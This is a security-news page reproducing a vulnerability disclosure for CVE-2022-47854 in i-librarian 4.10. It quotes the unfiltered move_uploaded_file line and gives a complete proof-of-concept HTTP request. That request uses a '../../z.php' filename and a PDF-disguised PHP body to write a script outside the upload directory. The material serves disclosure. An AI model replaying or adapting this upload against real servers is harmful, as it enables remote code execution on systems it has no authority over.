Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-47854: Arbitrary file upload in ajaxsupplement.php · Issue #155 · mkucej/i-librarian

i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.

CVE
Open in Source
#windows#php#pdf#firefox

Summary

The $_POST[‘filename’] is not filtered so that the php suffix file can be uploaded across directories.

Detail

Using the replace PDF function, an attacker can upload a file with php as the suffix and %PDF as the beginning of file content to any directory by controlling the filename parameter.

if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp')))
...
...
else
move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']);

POC

like this

POST /ajaxsupplement.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483
Content-Length: 981
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/index2.php
Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="file"

1
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="filename"

../../z.php
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file"; filename="1.php"
Content-Type: application/pdf

%PDF
<?php phpinfo();?>
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file_link"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_graphical_abstract"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_supplementary_file[]"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="proxystr"


-----------------------------36332819052109193833351732483--

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE